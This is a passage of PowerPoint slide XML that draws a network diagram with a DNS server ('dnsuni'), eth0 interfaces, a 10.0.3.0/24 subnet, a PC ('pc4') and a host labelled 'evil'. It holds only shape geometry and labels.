                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9286" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60BD3C16-3ED8-89AF-B863-D5BC672839B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9287" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F72639E-7EC5-3AFB-E88F-8459761D1A41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9288" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5A06F5-1354-A58D-80E9-022972C7521E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3087815" y="3547893"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9289" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D2B28CD-5D09-0C08-FB54-F8F22E4A89E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9290" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62E6572B-819E-6BED-FB83-7425C0D98A88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9291" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BD65A59-0637-4979-FD63-0C4A6A86D1A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3109411" y="4016212"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9292" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB394001-39C3-5866-8B39-46A3C066AF91}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9293" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE025422-A489-5646-703A-346205F28C40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9295" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{897F8494-8251-191B-38B9-5B68A97C1F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076643" y="3780075"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9296" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4164336E-18B8-39C0-582D-7EAFC356D8AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="3761897"/>
            <a:ext cx="1066318" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9300" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08B0BBE6-20C7-03FB-6220-FB72F1F299AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1245708" y="2923524"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9302" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A873489-0260-1AE4-3BC9-D99DDE04BAE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4936638" y="5924428"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9303" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3758769B-07F8-BCEE-82A0-8B0BACD01186}"/>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52" y="1064"/>
              <a:ext cx="573"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304" name="Text Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8E708F0-8BE9-4236-A510-A5FE3B9A8785}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9309" name="Gruppo 9308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C759F6-C537-A674-EC3D-55C2A0A4F5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1862910" y="1768735"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9310" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B75E40-CCBF-1016-827A-F5841A820650}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>evil</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9311" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC776186-EDC3-0A7F-28C0-2331312AC330}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9312" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E2DC07-B970-2162-1700-47ABCC2308F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
